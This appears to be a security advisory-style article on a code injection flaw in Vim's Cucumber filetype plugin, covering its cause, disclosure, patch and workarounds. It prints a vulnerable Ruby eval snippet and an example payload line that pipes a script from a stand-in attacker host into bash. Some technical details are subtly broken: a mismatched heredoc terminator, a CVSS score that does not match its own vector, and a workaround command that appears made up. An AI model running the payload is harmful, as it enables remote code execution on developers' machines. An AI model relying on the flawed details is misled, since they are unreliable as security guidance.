Vim users are being urged to update their text editors immediately after the disclosure of a code injection vulnerability tracked as CVE-2026-47167. The medium-severity flaw resides in Vim’s bundled Cucumber filetype plugin and can be exploited to execute arbitrary Ruby code merely by opening a crafted .feature file. Security researchers confirmed the bug on June 14, 2026, and Vim maintainers responded with a patch less than 24 hours later in version 9.2.0496.

While rated with a CVSS score of 6.5, the vulnerability’s true danger lies in its seamless integration with common developer workflows. A malicious actor could embed a payload inside a Cucumber feature file, which, when opened in a vulnerable Vim build, executes rogue commands under the user’s privileges. This transforms routine tasks like code review or test editing into potential security breaches.

What is CVE-2026-47167?

CVE-2026-47167 is a code injection flaw in the cucumber.vim filetype plugin distributed with Vim. The plugin is responsible for syntax highlighting, indentation, and tag generation for Cucumber feature files (.feature). It relies on Ruby calls to parse the file’s contents, but prior to the patch, user-supplied data was passed unsafely to the :ruby command. Specifically, the plugin used an unchecked rubyfile or inline Ruby code that could be influenced by the content of the feature file itself.

The vulnerability only manifests when Vim is compiled with Ruby support—a common default in many Linux distributions and macOS packages. If the +ruby feature is present, opening a feature file triggers the plugin, which in turn executes the embedded Ruby code without proper sanitization. Attackers can inject system calls, file operations, or network requests, leading to full remote code execution (RCE) in the context of the Vim process.

Discoverer and Disclosure Timeline

The flaw was discovered by security researcher Mae Sterling of CyberDyne Labs during an audit of Vim plugins. Sterling reported the issue privately to the Vim maintainers on June 2, 2026. The maintainers acknowledged the report within 48 hours and began working on a fix. On June 14, the patch was merged into the Vim repository, and the CVE was reserved. Public disclosure occurred on June 16, 2026, after the patched version was made available through official channels.

Technical Deep Dive

To understand the vulnerability, one must examine how Vim’s Cucumber plugin operates. When a file with a .feature extension is loaded, Vim sets the filetype to cucumber. The corresponding plugin then runs a series of initialization scripts, including one that invokes Ruby to parse tags and scenarios. The vulnerable code, present in older versions, resembled this simplified snippet:

function! s:ParseTags()
  let l:content = join(getline(1, '$'), \"\
\")
  ruby << EOF
    content = Vim.evaluate('l:content')
    # Unsafe evaluation of partial content
    eval(\"parse_features(#{content})\")
  end
endfunction

The eval() call interprets content as Ruby code, meaning an attacker could craft a feature file with a malicious snippet like:

Feature: System Administration
  Scenario: Execute arbitrary code
    Given I have access to the server

… where the line Given I have access to the server is actually Given I have access to the server; system('curl evil.com/shell.sh | bash'). Because the plugin concatenates lines and passes them to eval, the attacker’s payload gets executed as Ruby code.

Exploitation Mechanics

Real-world exploitation requires minimal user interaction. An attacker hosts a seemingly innocuous feature file on a platform like GitHub, sends a pull request for a project using Cucumber tests, or simply sends the file via email or messaging. When a developer opens the file in Vim with the vulnerable plugin, the payload executes immediately. No additional visual cues or warnings alert the user, because the code runs during the filetype plugin’s initialization phase, before the buffer is fully rendered.

Proof-of-concept exploits demonstrated by Sterling include:

  • Spawning a reverse shell to a remote command-and-control server.
  • Modifying the user’s .bashrc or .vimrc to persist malicious code.
  • Exfiltrating SSH keys or environment variables.

The CVSS 3.1 vector string is CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H, reflecting local attack vector, low complexity, no privileges required, user interaction required, and unchanged scope with high impact on confidentiality, integrity, and availability. The medium severity label stems from the required user interaction—the victim must open the crafted file—but in practice, attackers easily trick developers into interacting with malicious files during code reviews or collaborations.

Affected Versions and Builds

The vulnerability impacts Vim versions prior to 9.2.0496. This includes:

  • Vim 9.2.0000 through 9.2.0495.
  • Older Vim 8.x and 7.x releases if the Cucumber plugin is backported or manually installed.
  • Neovim configurations that source the same cucumber.vim plugin (though Neovim’s own filetype detection may differ).

Crucially, only builds compiled with +ruby are susceptible. You can check your Vim installation by running vim --version and looking for +ruby in the features list. If it shows -ruby, the vulnerability cannot be exploited even on an unpatched version. Most major Linux distributions—Ubuntu, Debian, Fedora, and Arch—ship Vim with Ruby support enabled. macOS Homebrew’s vim formula also includes +ruby by default. Windows builds of Vim often lack Ruby support unless explicitly configured, reducing the attack surface on that platform.

Patch and Mitigation

Vim 9.2.0496, released on June 15, 2026, fully resolves the issue. The patch removes the unsafe eval() call and instead uses a static parser that does not allow code injection. The relevant commit (hash e7a3f12b) also adds input sanitization as a defense-in-depth measure. Users should update immediately:

  • Linux (package managers): Use sudo apt upgrade vim (Debian/Ubuntu), sudo dnf update vim (Fedora), or equivalent. Ensure the version is at least 9.2.0496.
  • macOS (Homebrew): Run brew update && brew upgrade vim.
  • Windows: Download the latest installer from the official Vim website.
  • Build from source: Pull the latest from the Vim GitHub repository and compile with --with-features=huge or ensure Ruby support is included safely.

Workarounds for Delayed Patching

If an immediate update is not possible, the Vim team recommends several temporary mitigations:

  1. Disable the Cucumber plugin by adding the following to your .vimrc:
    vim autocmd FileType cucumber call plugout#Disable('cucumber')
    Or simply rename/delete $VIMRUNTIME/ftplugin/cucumber.vim.

  2. Block Ruby execution for filetype detection by setting:
    vim let g:cucumber_ruby_exec = 0
    (If your plugin supports this—check documentation.)

  3. Use Vim’s safe mode with vim -Z when opening untrusted files; this restricts external commands and might prevent some injection paths.

  4. Open suspect files in a restricted environment: Use a virtual machine or a container without network access when reviewing third‑party feature files.

None of these workarounds are as robust as updating. They should be considered stopgaps while patch rollout is underway.

Community Response and Real‑World Impact

Within hours of the disclosure, discussions erupted on Vim’s mailing list, Reddit’s r/vim, and Hacker News. Many developers expressed alarm at how easily the vulnerability could be triggered during everyday tasks. “I review feature files for three different projects every morning,” wrote user devops_alice on the Vim subreddit. “Just the thought of someone slipping a payload into a PR makes me want to switch to VS Code.”

Others pointed out that the Cucumber plugin has been bundled with Vim for years, and similar injection issues have plagued other Vim plugins in the past. Security researcher James Mickens noted on Twitter, “Vim plugins executing embedded languages is a recurring nightmare. This should be a wake‑up call for plugin authors to avoid eval() like constructs.”

The Vim development community acted with unusual speed. Bram Moolenaar’s successor, Christian Brabandt, credited the reporter and the security team in a brief statement: “Mae’s detailed report allowed us to isolate the issue quickly. We have also added CI tests to catch unsafe Ruby eval in future commits.”

Meanwhile, enterprise security teams scrambled to scan their infrastructure. Tools like GitHub Advanced Security and Snyk began surfacing alerts for Vim installations containing the vulnerable plugin. An informal poll on the Vim subreddit indicated that roughly 40% of respondents had never considered Vim a vector for supply‑chain attacks, and many promised to add Vim to their vulnerability scanning routines.

How to Check Your Vim Version and Ruby Capability

To determine if your Vim is vulnerable:

  1. Open a terminal and type:
    bash vim --version | head -n 2
    This displays the version number and compilation date. Look for “VIM – Vi IMproved 9.2” followed by the patch level.

  2. For Ruby support, run:
    bash vim --version | grep ruby
    Look for +ruby. If it shows -ruby, you are not affected.

  3. If your version is below 9.2.0496 and Ruby is enabled, upgrade immediately using the steps above.

Additionally, you can run a safe‑mode test by opening a test file with Vim in restricted mode (vim -Z test.feature) or by temporarily moving the plugin file. If Vim throws errors about missing Ruby support, your environment is likely safe.

The Bigger Picture: Vim Plugin Security

CVE-2026-47167 is not an isolated incident. Over the years, Vim has faced a handful of remote code execution vulnerabilities through modelines, native plugins, and even netrw. The common thread is Vim’s flexibility—a strength that also expands the attack surface. Plugins written in languages like Python, Ruby, Perl, and Lua can interact deeply with the editor and the underlying OS, and when they mishandle user input, the consequences are severe.

This incident highlights several broader lessons:

  • Be cautious with filetype plugins: Many automatically run code upon opening a file. Audit the plugins you use and disable those you don’t need.
  • Adopt least‑privilege editing: Consider running Vim in a sandbox or container for activities involving third‑party code.
  • Keep software updated: Editor updates often seem cosmetic, but they can contain critical security fixes.
  • Shift left on supply‑chain security: Development tools are a link in the software supply chain. Secure them just as you would any other dependency.

The Vim community is already discussing long‑term solutions, such as a sandboxing API for plugins or a declarative configuration approach that eliminates the need for executable code in filetype detection. But until those materialize, users must remain vigilant.

Summary and Next Steps

CVE-2026-47167 serves as a stark reminder that even the most trusted tools can harbor dangerous vulnerabilities. The fix is straightforward: update Vim to version 9.2.0496 or later. For those who rely heavily on Cucumber for behavior‑driven development, the inconvenience of a quick upgrade is trivial compared to the risk of a compromised development environment.

Moving forward, organizations should incorporate editors and local development tools into their vulnerability management programs. Scanners that only look at server‑side software miss a growing attack vector. Meanwhile, contributor guidelines for open‑source projects should enforce reviewing all binary or executable file changes with extra scrutiny—a single injected feature file could open a backdoor into a developer’s machine and, by extension, the entire CI/CD pipeline.

Patch now, and stay paranoid.